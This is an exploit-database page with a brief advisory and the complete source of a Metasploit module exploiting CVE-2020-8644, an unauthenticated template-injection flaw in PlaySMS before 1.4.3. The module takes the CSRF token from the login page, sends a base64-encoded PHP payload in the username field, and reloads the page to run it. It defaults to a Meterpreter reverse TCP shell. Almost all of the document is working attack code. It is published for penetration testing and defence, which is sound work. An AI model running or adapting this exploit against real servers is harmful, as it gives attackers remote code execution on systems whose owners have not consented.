PlaySMS index.php Unauthenticated Template Injection Code Execution

This module exploits a preauth Server-Side Template Injection vulnerability in PlaySMS before version 1.4.3, leading to remote code execution. The vulnerability is caused by double processing a server-side template with a custom PHP template system called 'TPL', which is used in the PlaySMS template engine. An attacker can submit a username with a malicious payload, which is stored in a TPL template. When the template is rendered a second time, code execution occurs. The TPL template language is vulnerable to PHP code injection.

Mitigation:

Update PlaySMS to version 1.4.3 or later.

Source

Exploit-DB raw data:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'PlaySMS index.php Unauthenticated Template Injection Code Execution',
        'Description' => %q{
          This module exploits a preauth Server-Side Template Injection vulnerability that leads to remote code execution
          in PlaySMS before version 1.4.3. This issue is caused by double processing a server-side template with a custom
          PHP template system called 'TPL' which is used in the PlaySMS template engine at
          `src/Playsms/Tpl.php:_compile()`. The vulnerability is triggered when an attacker supplied username with a
          malicious payload is submitted. This malicious payload is then stored in a TPL template which when rendered a
          second time, results in code execution.
          The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.

          This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.
        },
        'Author' =>
            [
              'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
              'Lucas Rosevear' # Found and Initial PoC by NCC Group
            ],
        'License' => MSF_LICENSE,
        'References' =>
            [
              ['CVE', '2020-8644'],
              ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
              ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
            ],
        'DefaultOptions' =>
            {
              'SSL' => false,
              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
              'ENCODER' => 'php/base64'
            },
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' =>
            [
              [ 'PlaySMS Before 1.4.3', {} ],
            ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2020-02-05'
      )
      )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base playsms directory path', '/']),
      ]
    )
  end

  def uri
    return target_uri.path
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, 'index.php')
      })
    rescue StandardError
      vprint_error('Unable to access the index.php file')
      return CheckCode::Unknown
    end

    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
      return Exploit::CheckCode::Appears
    end

    return CheckCode::Safe
  end

  # Send Payload in Login Request
  def login
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login'
      }
    })

    # Grabbing CSRF token from body
    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine the CSRF token") if csrf.nil?
    vprint_good("X-CSRF-Token for login : #{csrf}")

    cookies = res.get_cookies

    vprint_status('Trying to send the payload in the username field...')

    # Encoded in base64 to avoid HTML TAGS which are filter by the Application which is also blocking semicolon(;), that is why we're using delete_suffix(';')
    evil = "{{#{payload.encoded.delete_suffix(';')}}}"

    # Send Payload with cookies.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'cookie' => cookies,
      'vars_get' => Hash[{
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
        'op' => 'login'
      }.to_a.shuffle],
      'vars_post' => Hash[{
        'X-CSRF-Token' => csrf,
        'username' => evil,
        'password' => ''
      }.to_a.shuffle]
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # Request Status Check
    if res.code == 302
      print_good('Payload successfully sent')
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Something went wrong")
    end
  end

  def exploit
    cookies = login
    vprint_status("Cookies here : #{cookies}")
    # Execute Last Sent Username.
    send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'cookie' => cookies,
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login'
      }
    }, 0)
  end
end